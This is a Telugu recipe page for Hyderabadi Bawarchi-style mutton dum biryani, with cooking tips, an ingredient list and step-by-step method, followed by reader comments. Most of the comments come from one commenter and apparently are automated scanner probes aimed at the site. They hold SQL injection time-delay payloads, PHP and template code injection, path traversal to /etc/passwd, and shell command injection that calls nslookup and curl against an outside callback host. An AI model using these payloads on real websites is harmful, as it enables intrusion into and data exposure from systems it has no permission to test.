హైదరాబాద్లో ఎంతో ఫెమస్ అయిన బావార్చి స్టైల్ మటన్ బిర్యానీ

ఎంత తిన్నా ఎన్ని సార్లు తిన్నా మళ్ళీ మళ్ళీ తినాలనిపించే స్పెషల్ బిర్యానీ అంటే హైదరాబాదీ మటన్ ధమ్ బిర్యానీ. రెసిపీలోని సింపుల్ స్టెప్స్ టిప్స్ చాలు సూపర్ హిట్ మటన్ ధం బిర్యానీ కోసం.

వీకెండ్స్కి లేదా బిర్యానీ తినాలనిపించినప్పుడు నా స్టైల్ రెసిపీ ఫాలో అయితే చాలు, వంట రాని వారు కూడా వండర్స్ చేస్తారు. భారత దేశమంతటా బిర్యానీలున్నా హైదరాబాదీ బిర్యానీ క్రేజ్ వేరు. మసాలాల ఘాటు, చుర్రుమనిపించే కారం, పుదీనా కొత్తిమీర కుంకుమపువ్వు పరిమళం, కమ్మని నెయ్యి సువాసనతో ఎంతో ప్రేత్యేకం హైదరాబాదీ మటన్ ధామ్ బిర్యానీ.

నేను హైదరాబాద్లో ఎంతో ఫెమస్ అయిన బావార్చి స్టైల్ మటన్ బిర్యానీ చేస్తున్నా. ఇది కచ్చి ఘోష్ ధామ్ బిర్యానీ. అంటే పచ్చి మాంసంకి మసాలాలు పట్టించి ధామ్ మీద మాంసం ఉడికిఞ్చి తయారు చేసే బిర్యానీ. ఈ తీరు హైదరాబాద్లో ఎంతో ఫెమస్. కచ్చి ఘోష్కి బిర్యానీలో మాంసం మెత్తగా ఉడికి ఎంతో మృదువుగా ఉంటుంది. అన్నం పొడిపొడిగా ఉంటూ మెతు నోట్లో చేరగానే వెన్నలా కరిగి జారిపోతుంది గొంతులోకి. పక్కి ఘోష్కి బిర్యానీ అని మరో తీరు కూడా ఉంది, అది మరో సారి చెప్తా. హైదరాబాదీలు ఎక్కువగా కచ్చి ఘోషకి బిర్యానీనే ఇష్టంగా తింటారు.

సాధారణంగా ఇళ్లలో చేసే బిర్యానీలకి కొన్ని ఇబ్బందులుంటాయి, అడుగు మాడిపోవడం, సరైన బిర్యానీ ఫ్లేవర్ లేకపోవడం, మాంసం పూర్తిగా ఉడకపోవడం, లేదా అడుగు మాసాల తడిగా మిగిలిపోవడం. ఇలాంటి ఇబ్బందులు పొరపాట్లు ఏవి జరగకుండా అడుగడుగునా స్టెప్ టిప్స్ని ఫాలో అవుతూ చేయండి. 100% బెస్ట్ హైదరాబాదీ స్టైల్ మటన్ ధమ్ బిర్యానీ వచ్చి తీరుతుంది. కానీ చేసే ముందు టిప్స్ కచ్చితంగా పాటించండి.

Hyderabad Bawarchi Style Mutton Dum Biryani

టిప్స్

మాంసం:

మాంసం లేతగా చక్కాగా ఉడికిపోతుంది, ఇంకా మసాలాలు బాగా పీల్చుకుంటుంది. బిర్యానీలకి మీడియం సైజు ముక్కలు ఉండాలి మరీ చిన్న ముక్కలైతే బిర్యానీలో కలిసిపోతాయి .

మాంసం మెత్తగా ఉడకాలంటే

లేత మాంసానికి పచ్చితంగా పచ్చి బొప్పాయి తోలు పేస్ట్, జాజికాయ పొడి వేసి రుద్ది పట్టించి రాత్రంతా నానితే మెత్తబడుతుంది.

మాంసానికి మసాలాలు రుద్ది రుద్ది పట్టించి ఎత్తి గిన్నెలో వేగంగా కొట్టాలి, అప్పుడు మాంసం కాస్త నలిగి మసాలాలు ఇంకుతాయ్ మాంసంలోకి. ఇంకా మాంసం మెత్తగా ఉడుకుతుంది.

బిర్యానీ కి సరైన పాత్రలు:

బిర్యానీ అడుగు పట్టకుండా ఉండాలనుంటే కచ్చితంగా అడుగు మందంగా ఉండే గిన్నెలు అవసరం. అప్పడే మాంసం అడుగు పట్టదు.

ఇంకా ఎప్పుడైనా kg మాంసం వండే బిర్యానీలకి 8 లీటర్ల సైజు పాత్ర ఉండాలి. నేను ఈ బిర్యానీ kg మాంసం ½ కిలో బియ్యంతో చేస్తున్నాను.

బిర్యానీ రైస్ పొడి పొడిగా రావాలంటే:

  1. బాస్మతి బియ్యం మాంచి క్వాలిటీవి సంవత్సరం కంటే పాతవి అయిఉండాలి.

  2. ఎప్పుడు కూడా బిర్యానీ ధం చేసే గిన్నెలో రైస్ ముప్పావు భాగమే వేయాలి. అప్పుడు ధం మీద మెతుకు పువ్వులా విచ్చుకునేందు వీలవుతుంది. మెతుకు చక్కగా ఉడికి పొడి పొడిగా ఉంటుంది.

నూనె- నెయ్యి:

బిర్యానీలకి నూనె నెయ్యి చాలినంత వేయాలి, అప్పుడే రుచి. నూనె నెయ్యి చాలినంత వేయకపోతే బిర్యానీ చల్లారాక బిరుసెక్కిపోతుంది ఇంకా నోట్లో మృదువుగా జారదు.

బిర్యానీ సువాసన ఇలా చేస్తే తగ్గుతుంది:

  1. సాధారణంగా బిర్యానీలకి మసాలా దినుసులు సరైన మోతాదు సరైన క్వాలిటీవి ఉండాలి. లేదంటే బిర్యానీ రుచిగా ఉన్నా బిర్యానీ సువాసన ఉండదు. సరైన బిర్యానీ అంటే ఇంట్లో వండితే వీధిలోకి రావాలి సువాసన.

  2. దయచేసి తాజా గరం మసాలా వాడుకోండి. రెడీమేడ్ పాకెట్ కొద్దిగా వాడి వదిలేసినా పాకెట్ వాడకండి, అందులో పరిమళం తగ్గిపోయి ఉంటుంది.

పచ్చిబొప్పాయికి బదులు:

పచ్చిబొప్పాయి తోలులోని పాలు మాంసాన్ని మృదువుగా చేస్తుంది. ఒకవేళ పచ్చిబొప్పాయి అందుబాటులో లేనట్లయితే మసాలాలు పట్టించి రాత్రంతా ఫ్రిజ్లో ఉంచుకోవాలి. తరువాతి రోజు బిర్యానీ చేయడానికి గంట ముందు బయట ఉంచితే చల్లదనం పోతుంది ఆ తరువాత రైస్ వేసి ధమ్ చేసుకోండి.

బిర్యానీలో ఉప్పు కారం తగ్గితే:

బిర్యానీలో ఉప్పు కారం రెండు మాంసానికి మసాలాలు పట్టించిన వెంటనే చూసుకోవాలి. ఇక్కడ పొరపాటు జరిగితే ఇంకెక్కడా మీరు ఉప్పు కారం సరిచేయలేరు.

ధమ్ చేసే తీరు:

స్టీమ్ బయటకి పోకుండా గిన్నె అంచులకి గోధుమపిండి ముద్ద పెట్టి సీల్ చేసి పెనం మీద పెట్టి హాయ్ ఫ్లేమ్ మీద స్టీమ్ వేగంగా తన్నుకొచ్చే వరకు హై ఫ్లేమ్ మీద ఆ తరువాత లౌ ఫ్లేమ్ మీద ఈ కొలతకి 25 నిమిషాలు ఉంచుకోవాలి.

హైదరాబాద్లో ఎంతో ఫెమస్ అయిన బావార్చి స్టైల్ మటన్ బిర్యానీ - రెసిపీ వీడియో

Hyderabad Bawarchi Style Mutton Dum Biryani

Non Veg Biryanis | nonvegetarian
  • Prep Time 10 mins
  • Cook Time 45 mins
  • Total Time 55 mins
  • Servings 7

కావాల్సిన పదార్ధాలు

  • ఉల్లిపాయలు వేపుకోడానికి
  • 1/4 kilo ఉల్లిపాయ చీలికలు
  • 1/2 cup నూనె (125 ml)
  • మాంసం నానబెట్టడానికి
  • 1 kilo లేత మాంసం
  • 1/4 cup పచ్చిబొప్పాయి తోలు
  • 4 పచ్చిమిర్చి
  • 1/2 tsp జాజికాయ పొడి
  • 2 - 2 1/2 అల్లం వెల్లులి పేస్ట్
  • మీడియం సైజు ఉల్లిపాయ చీలికలు
  • 3 1/2 tsp ఉప్పు
  • 2 tsp ధనియాల పొడి
  • 2 tsp వేయించిన జీలకర్ర పొడి
  • 3 tbsp కారం
  • 1/4 tsp పసుపు
  • 1 tbsp గరం మసాలా
  • 1 tsp షాహీ జీరా
  • 6 - 7 లవంగాలు
  • 2 inch దాల్చిన చెక్క
  • 2 బిర్యానీ ఆకులు
  • 5 యాలకలు
  • 2 మరాఠీ మొగ్గలు విరిచినవి
  • వేపుకున్న ఉల్లిపాయ తరుగు - సగం
  • ఒక నిమ్మకాయ రసం
  • 1.5 tbsp నెయ్యి
  • 250 ml పెరుగు
  • 1 tbsp కుంకుమ పువ్వు పాలు
  • పుదీనా తరుగు - చిన్న కట్ట
  • కొత్తిమీర - చిన్న కట్ట
  • రైస్ ఉడికించడానికి
  • 3 liters నీళ్లు
  • 5 యాలకలు
  • 10 - 12 లవంగాలు
  • 4 నల్ల యాలక
  • 4 inches దాల్చిన చెక్క
  • 2 మరాఠీ మొగ్గలు (తుంపినవి)
  • 1 tbsp షాహీ జీరా
  • 2 అనాసపువ్వు
  • పత్తర్ పూల్ - కొంచెం
  • పుదీనా - చిన్న కట్ట
  • కొత్తిమీర- చిన్న కట్ట
  • ఒక నిమ్మకాయ రసం
  • జాపత్రి - కొంచెం
  • 3 బిర్యానీ ఆకులు
  • 3 - 4 tbsps ఉప్పు
  • 1/2 kilo బాస్మతి బియ్యం (గంటసేపు నానబెట్టినది)
  • ధమ్ చేసుకోడానికి
  • పిండి ముద్ద
  • 80 ml నెయ్యి
  • 125 ml రైస్ని ఉడికించుకున్న నీరు (మాంసంలో కలపడానికి)
  • పుదీనా - కొద్దిగా
  • కొత్తిమీర తరుగు - కొద్దిగా
  • ఫ్రైడ్ ఆనియన్ - మిగిలినది
  • 1/4 cup కుంకుమ పువ్వు పాలు
  • 4 tbsp రైస్ని ఉడికించున్న నీళ్లు (ధం చేసుకోడానికి)
  • 1/4 tsp గరం మసాలా

విధానం

  1. ఉల్లిపాయ చీలకల్ని అరకప్పు మరిగే వేడి నూనెలో వేసి లేత బంగారు రంగు వచ్చేదాకా వేపుకోవాలి.
  2. ఉల్లిపాయలు రంగు మారుతున్నప్పుడు వెంటనే తీసి జల్లెడలో వేసి వదిలేస్తే చల్లారేపాటికి మాంచి రంగు వచ్చేస్తాయి.
  3. పచ్చి బొప్పాయి ముక్కలు, పచ్చిమిర్చి జాజికాయ పొడి కొద్దిగా నీళ్లు వేసి మెత్తని పేస్ట్ చేసుకోండి
  4. అడుగు మందంగా ఉండే గిన్నెలో మాంసం వేసుకోండి అందులో మాంసం నానబెట్టడానికి ఉంచిన పదార్ధాలన్నీ వేసుకోండి.
  5. మసాలాలని మాంసానికి బాగా పట్టించి మాంసాన్ని మసాలాలతో గట్టిగా రుద్దుతూ ఎత్తి గిన్నెకేసి కొడుతూ 5-6 నిమిషాల పాటు మసాలాలు పట్టించి. ఫ్రిజ్లో కనీసం 3 గంటలు ఉంచండి. రాత్రంతా ఉంచగలిగితే ఎంతో బాగుంటుంది.
  6. అరకిలో బియ్యాన్ని కడిగి నీళ్లు పోసి నానబెట్టుకోండి.
  7. నీళ్లని మరిగించండి. మరిగే నీళ్లలో మసాలా దినుసులు అన్నీ వేసి హై-ఫ్లేమ్ మీద 5-6 నిమిషాలు తెర్ల కాగనివ్వాలి.
  8. తెర్లుతున్న ఎసరులోంచి ½ కప్పు నీళ్లు తీసుకుని మూడు గంటలు నానుతున్న మాంసంలో కలుపుకోండి. ఇలా ఎసరు నీళ్లు కలిపితే మాంసం అడుగుపెట్టాడు. ధం అయ్యాక మాసాల పొడిగా అవ్వదు.
  9. మరుగుతున్న ఎసరు సముద్రపు నీరంతా ఉప్పగా ఉండాలి. ఉప్పు చాలకపోతే వేసుకోండి. మరుగుతున్న ఎసరులో బియ్యం వేసి హై ఫ్లేమ్ మీద 50% ఉడికించుకోండి.
  10. 50% అంటే సగం ఉడికి ఉండాలి. నోట్లో ఒక గింజ వేసుకుంటే తెలిసిపోతుంది. అలా 50% ఉడికిన అన్నాన్ని సగం పైన తీసుకుని మాంసం అంతా వెదజల్లండి(గరిటతో అదమకండి).
  11. తరువాత 60% ఉడికిన అన్నం సగం వేసుకోండి. ఇంకో 3 నిమిషాలకి 7-% ఉడికిపోతుంది అది వేసుకోండి మసాలాలతో సహా.
  12. బిర్యానీ రైస్ పైన కొత్తిమీర, పుదీనా, గరం మసాలా, కుంకుమ పువ్వు పాలు, నెయ్యి వేపిన ఉల్లిపాయ తరుగు, ఎసరు నీళ్లు అంచుల వెంట పోసుకోండి.
  13. బిర్యానీ గిన్నె అంచుల వెంత తడి చేసి పిండి ముద్ద ఉంచండి. తరువాత మూత పెట్టి ధామ్ బయటికి పోకుండా మూత పెట్టి మూత మీద బరువు ఉంచండి.
  14. పెనం మీదికి బిర్యానీ గిన్నె ఎక్కించి స్టీమ్ బయటకి వేగంగా వచ్చేదాకా హై ఫ్లేమ్ మీద ధం చేసుకోండి. స్టీమ్ వేగంగా వచ్చాక మంట పూర్తిగా తగ్గించి మరో 25 నిమిషాలు ధామ్ చేసి స్టవ్ ఆపేసి పెనం మీద 30 నిమిషాలు వదిలేయండి.
  15. 30 నిమిషాల తరువాత అడుగు నుండి నెమ్మదిగా తీసి ఘుమఘుమలాడే బెస్ట్ హైదరాబాదీ కచ్చి ఘోష్కి బిర్యానీని చల్లని రైతాతో ఆనందించండి.

Leave a comment

Rate this Recipe:
Your email address will not be published.

96 comments

  • K
    kokka
    Recipe Rating:
    Super Taste
  • P
    Pranit
    Wow nice 👍
  • S
    Shanthan
    Super ga vachindi
  • S
    Sajida
    Recipe Rating:
    Tried this receipe last Sunday. It turned out super delicious.
  • P
    Prabhakar
    Recipe Rating:
    Excellent recipe
  • H
    Hymavathi
    We love ur recieps
  • V
    Venky
    Haii Brother I need to learn cooking can you please teach me I need to start hotel can you please teach
  • S
    Shaik china bujji saheb
    SO YUMMY BUT CLEARLY NOT MENTIONED IN DESCRIPTION WHAT IS TABLE SPOON AND WHAT IS TEA SPOON IN TSP
    • K
      kEMlzpAX
      Recipe Rating:
      @@ElzRv
    • K
      kEMlzpAX
      Recipe Rating:
      1????%2527%2522\'\"
    • K
      kEMlzpAX
      Recipe Rating:
      1'"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    • K
      kEMlzpAX
      Recipe Rating:
      1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    • K
      kEMlzpAX
      Recipe Rating:
      18TQFFcRx')) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1YRPtuu30') OR 520=(SELECT 520 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1L29sSpQG' OR 66=(SELECT 66 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1)) OR 888=(SELECT 888 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1) OR 552=(SELECT 552 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 OR 309=(SELECT 309 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1ENjyt7sI'; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1); waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    • K
      kEMlzpAX
      Recipe Rating:
      10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
    • K
      kEMlzpAX
      Recipe Rating:
      10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
    • K
      kEMlzpAX
      Recipe Rating:
      1*if(now()=sysdate(),sleep(15),0)
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 3+744-744-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 2+744-744-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      12zN9vxu3
    • K
      kEMlzpAX
      Recipe Rating:
      [php]print(md5(31337));[/php]
    • K
      kEMlzpAX
      Recipe Rating:
      {php}print(md5(31337));{/php}
    • K
      kEMlzpAX
      Recipe Rating:
      print(md5(31337));//
    • K
      kEMlzpAX
      Recipe Rating:
      '{${print(md5(31337))}}'
    • K
      kEMlzpAX
      Recipe Rating:
      '.print(md5(31337)).'
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}\
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}
    • K
      kEMlzpAX
      Recipe Rating:
      ";print(md5(31337));$a="
    • K
      kEMlzpAX
      Recipe Rating:
      ';print(md5(31337));$a='
    • K
      kEMlzpAX
      Recipe Rating:
      ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    • K
      kEMlzpAX
      Recipe Rating:
      gethostbyname(lc('hitqe'.'pvizxyts13455.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(79).chr(111).chr(86)
    • K
      kEMlzpAX
      Recipe Rating:
      ".gethostbyname(lc("hitvf"."bgvvotsy1733b.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(80).chr(101).chr(85)."
    • K
      kEMlzpAX
      Recipe Rating:
      '.gethostbyname(lc('hitum'.'kwmsginxdc7c8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(83).chr(112).chr(73).'
    • K
      kEMlzpAX
      Recipe Rating:
      ./1
    • K
      kEMlzpAX
      Recipe Rating:
      ../1
    • K
      kEMlzpAX
      Recipe Rating:
      file:///etc/passwd
    • K
      kEMlzpAX
      Recipe Rating:
      vismaifood.com
    • K
      kEMlzpAX
      Recipe Rating:
      '"
    • K
      kEMlzpAX
      Recipe Rating:
      https://vismaifood.com/
    • K
      kEMlzpAX
      Recipe Rating:
      xfs.bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    • K
      kEMlzpAX
      Recipe Rating:
      hyderabad-bawarchi-style-mutton-dum-biryani/.
    • K
      kEMlzpAX
      Recipe Rating:
      hyderabad-bawarchi-style-mutton-dum-biryani
    • K
      kEMlzpAX
      Recipe Rating:
      hyderabad-bawarchi-style-mutton-dum-biryani
    • K
      kEMlzpAX
      Recipe Rating:
      1"||sleep(27*1000)*jtatsg||"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||sleep(27*1000)*hngdqg||'
    • K
      kEMlzpAX
      Recipe Rating:
      1"&&sleep(27*1000)*pbezya&&"
    • K
      kEMlzpAX
      Recipe Rating:
      1'&&sleep(27*1000)*xcurqm&&'
    • K
      kEMlzpAX
      Recipe Rating:
      '"()
    • K
      kEMlzpAX
      Recipe Rating:
      ;(nslookup -q=cname hitkfpdmvkamo64f83.bxss.me||curl hitkfpdmvkamo64f83.bxss.me)|(nslookup -q=cname hitkfpdmvkamo64f83.bxss.me||curl hitkfpdmvkamo64f83.bxss.me)&(nslookup -q=cname hitkfpdmvkamo64f83.bxss.me||curl hitkfpdmvkamo64f83.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      `(nslookup -q=cname hitgvoysorkgx0d809.bxss.me||curl hitgvoysorkgx0d809.bxss.me)`
    • K
      kEMlzpAX
      Recipe Rating:
      |(nslookup -q=cname hitotmvxvbgxv319b1.bxss.me||curl hitotmvxvbgxv319b1.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      &(nslookup -q=cname hitzcqwgruopq5fe85.bxss.me||curl hitzcqwgruopq5fe85.bxss.me)&'\"`0&(nslookup -q=cname hitzcqwgruopq5fe85.bxss.me||curl hitzcqwgruopq5fe85.bxss.me)&`'
    • K
      kEMlzpAX
      Recipe Rating:
      &nslookup -q=cname hitnbntwmrbsg89bdb.bxss.me&'\"`0&nslookup -q=cname hitnbntwmrbsg89bdb.bxss.me&`'
    • K
      kEMlzpAX
      Recipe Rating:
      'A'.concat(70-3).concat(22*4).concat(115).concat(75).concat(98).concat(86)+(require'socket' Socket.gethostbyname('hitag'+'kadpllgnce72a.bxss.me.')[3].to_s)
    • K
      kEMlzpAX
      Recipe Rating:
      $(nslookup -q=cname hitjjcpswcdrtacf55.bxss.me||curl hitjjcpswcdrtacf55.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      '+'A'.concat(70-3).concat(22*4).concat(104).concat(83).concat(105).concat(89)+(require'socket' Socket.gethostbyname('hitsl'+'qgwscflsb3d73.bxss.me.')[3].to_s)+'
    • K
      kEMlzpAX
      Recipe Rating:
      ^(#$!@#$)(()))******
    • K
      kEMlzpAX
      Recipe Rating:
      (nslookup -q=cname hitdogzmozzxh6b75e.bxss.me||curl hitdogzmozzxh6b75e.bxss.me))
    • K
      kEMlzpAX
      Recipe Rating:
      "+"A".concat(70-3).concat(22*4).concat(122).concat(80).concat(122).concat(87)+(require"socket" Socket.gethostbyname("hitfd"+"gxbyysqpd3dbd.bxss.me.")[3].to_s)+"
    • K
      kEMlzpAX
      Recipe Rating:
      !(()&&!|*|*|
    • K
      kEMlzpAX
      Recipe Rating:
      1|echo vvrdhi$()\ leuvwj\nz^xyu||a #' |echo vvrdhi$()\ leuvwj\nz^xyu||a #|" |echo vvrdhi$()\ leuvwj\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      |echo zvrjzw$()\ nosjoh\nz^xyu||a #' |echo zvrjzw$()\ nosjoh\nz^xyu||a #|" |echo zvrjzw$()\ nosjoh\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      1&echo nsoczd$()\ ubasri\nz^xyu||a #' &echo nsoczd$()\ ubasri\nz^xyu||a #|" &echo nsoczd$()\ ubasri\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      &echo iclgxt$()\ wzdvcm\nz^xyu||a #' &echo iclgxt$()\ wzdvcm\nz^xyu||a #|" &echo iclgxt$()\ wzdvcm\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      echo cqzmxh$()\ gjpfmv\nz^xyu||a #' &echo cqzmxh$()\ gjpfmv\nz^xyu||a #|" &echo cqzmxh$()\ gjpfmv\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      c:/windows/win.ini
    • K
      kEMlzpAX
      Recipe Rating:
      ../../../../../../../../../../../../../../etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      /etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      http://bxss.me/t/fit.txt?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      Http://bxss.me/t/fit.txt
    • K
      kEMlzpAX
      Recipe Rating:
      1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      1&n998292=v905916
    • K
      kEMlzpAX
      Recipe Rating:
      http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      ${10000141+10000351}
    • K
      kEMlzpAX
      Recipe Rating:
      12345'"\'\");|]*{ ?''💡
    • K
      kEMlzpAX
      Recipe Rating:
      n27KTkWy: HnLXIoxb
    • K
      kEMlzpAX
      Recipe Rating:
      WjVYzLMa
    • K
      kEMlzpAX
      Recipe Rating:
      "+response.write(9337561*9079353)+"
    • K
      kEMlzpAX
      Recipe Rating:
      '+response.write(9337561*9079353)+'
    • K
      kEMlzpAX
      Recipe Rating:
      response.write(9337561*9079353)
Hyderabad Bawarchi Style Mutton Dum Biryani